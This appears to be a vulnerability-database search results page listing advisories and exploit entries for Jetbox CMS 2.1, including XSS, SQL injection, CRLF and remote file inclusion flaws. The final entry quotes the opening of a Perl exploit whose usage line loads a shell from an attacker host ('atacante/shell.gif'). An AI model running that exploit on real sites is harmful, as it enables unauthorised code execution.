Lucene search
K

17 matches found

seebug.org
seebug.org
added 2014/07/01 12:0 a.m.11 views

Jetbox CMS 2.1 'liste' Parameter Cross Site Scripting Vulnerability

No description provided by source...

7.1AI score
Exploits0
Cvelist
Cvelist
added 2009/02/19 4:0 p.m.17 views

CVE-2008-6174

Cross-site scripting XSS vulnerability in admin/postlister/index.php in Jetbox CMS 2.1 allows remote attackers to inject arbitrary web script or HTML via the liste parameter...

5.7AI score0.01436EPSS
Exploits1References3
exploitpack
exploitpack
added 2008/10/23 12:0 a.m.23 views

Jetbox CMS 2.1 - liste Cross-Site Scripting

Jetbox CMS 2.1 - liste Cross-Site Scripting source: https://www.securityfocus.com/bid/31890/info Jetbox CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the brows...

6.8AI score
Exploits0
exploitpack
exploitpack
added 2008/10/20 12:0 a.m.27 views

Jetbox CMS 2.1 - admincmsnav.php?nav_id SQL Injection

Jetbox CMS 2.1 - admincmsnav.php?navid SQL Injection source: https://www.securityfocus.com/bid/31824/info Jetbox CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow a...

0.1AI score
Exploits0
NVD
NVD
added 2007/05/21 8:30 p.m.25 views

CVE-2007-2685

Multiple SQL injection vulnerabilities in index.php in Jetbox CMS 2.1 allow remote attackers to execute arbitrary SQL commands via the 1 view or 2 login parameter...

7.5CVSS8.4AI score0.01176EPSS
Exploits2References6
Cvelist
Cvelist
added 2007/05/21 8:0 p.m.31 views

CVE-2007-2685

Multiple SQL injection vulnerabilities in index.php in Jetbox CMS 2.1 allow remote attackers to execute arbitrary SQL commands via the 1 view or 2 login parameter...

8.4AI score0.01176EPSS
Exploits2References6
CVE
CVE
added 2007/05/21 8:0 p.m.51 views

CVE-2007-2685

Jetbox CMS 2.1 has SQL injection vulnerabilities in index.php via the view and login parameters, allowing remote attackers to execute arbitrary SQL commands. Root cause: improper handling of input in Jetbox CMS 2.1 leads to injectable SQL. Exploitation is described as remote with no authenticatio...

7.5CVSS8.4AI score0.01176EPSS
Exploits2References6Affected Software1
CVE
CVE
added 2007/05/21 8:0 p.m.51 views

CVE-2007-2684

Jetbox CMS 2.1 is affected by multiple information-disclosure vectors. The vulnerability arises from (1) direct requests to main_page.php, open_tree.php, and outputs.php, (2) a malformed view parameter to index.php enabling SQL-injection-like manipulation, and (3) the id[] parameter pass-through ...

5CVSS7.1AI score0.01614EPSS
Exploits1References9Affected Software1
Cvelist
Cvelist
added 2007/05/16 10:0 p.m.24 views

CVE-2007-2731

CRLF injection vulnerability in formmail.php in Jetbox CMS 2.1 might allow remote attackers to inject arbitrary e-mail headers via LF %0A sequences in the subject parameter, a related issue to CVE-2007-1898...

6.9AI score0.01571EPSS
Exploits1References8
Exploit DB
Exploit DB
added 2007/05/15 12:0 a.m.35 views

Jetbox CMS 2.1 Email - 'FormMail.php' Input Validation

source: https://www.securityfocus.com/bid/23989/info Jetbox CMS is prone to an input-validation vulnerabilitiy because it fails to adequately sanitize user-supplied input. Attackers can exploit this issue to send spam email in the context of the application. Jetbox 2.1 is vulnerable; other versio...

7.4AI score
Exploits0
Cvelist
Cvelist
added 2006/08/29 12:0 a.m.21 views

CVE-2006-4422

PHP remote file inclusion vulnerability in includes/phpdig/libs/searchfunction.php in Jetbox CMS 2.1 allows remote attackers to execute arbitrary PHP code via a URL in the relativescriptpath parameter, a different vector than CVE-2006-2270. NOTE: this issue has been disputed, and as of 20060830,...

7.4AI score0.04394EPSS
Exploits1References12
CVE
CVE
added 2006/08/29 12:0 a.m.67 views

CVE-2006-4422

CVE-2006-4422 describes a PHP remote file inclusion in Jetbox CMS 2.1. The vulnerability affects includes/phpdig/libs/search_function.php via a URL in the relative_script_path parameter, enabling arbitrary PHP code execution. This CVE is noted as having a vector different from CVE-2006-2270 and i...

7.5CVSS7.4AI score0.04394EPSS
Exploits1References12Affected Software1
CVE
CVE
added 2006/08/08 11:0 p.m.43 views

CVE-2006-3584

CVE-2006-3584 affects Jetbox CMS 2.1 SR1. The vulnerability is in index.php where inputs passed in the URL are evaluated as PHP variable variables, allowing remote attackers to overwrite configuration variables. This is caused by improper handling/sanitization of URL parameters and can lead to di...

7.5CVSS6.8AI score0.01524EPSS
Exploits0References5Affected Software1
Cvelist
Cvelist
added 2006/08/08 11:0 p.m.17 views

CVE-2006-3586

SQL injection vulnerability in Jetbox CMS 2.1 SR1 allows remote attackers to execute arbitrary SQL commands via the 1 frontsession COOKIE parameter and 2 view parameter in index.php, and the 3 login parameter in admin/cms/index.php...

8.3AI score0.01312EPSS
Exploits0References6
Cvelist
Cvelist
added 2006/05/09 10:0 a.m.19 views

CVE-2006-2270

PHP remote file inclusion vulnerability in includes/config.php in Jetbox CMS 2.1 allows remote attackers to execute arbitrary code via a URL in the relativescriptpath parameter...

7.5AI score0.14141EPSS
Exploits1References9
CVE
CVE
added 2006/05/09 10:0 a.m.64 views

CVE-2006-2270

CVE-2006-2270 : Jetbox CMS 2.1 has a PHP remote file inclusion in includes/config.php that allows an attacker to execute arbitrary PHP code by providing a URL in the relative_script_path parameter. The documents do not provide exploitation details or a published patch in the supplied material. Re...

7.5CVSS7.5AI score0.14141EPSS
Exploits1References9Affected Software1
exploitpack
exploitpack
added 2006/05/07 12:0 a.m.29 views

Jetbox CMS 2.1 - relative_script_path Remote File Inclusion

Jetbox CMS 2.1 - relativescriptpath Remote File Inclusion !/usr/bin/perl JetBox CMS Remote File Include Exploit & Advisorie: beford uso: perl own.pl perl own.pl http://host.com/jet/ http://atacante/shell.gif cmd cmd shell example: cmd variable: cmd; Description Vendor: http://jetbox.streamedge.co...

7.5AI score
Exploits0
Rows per page
Query Builder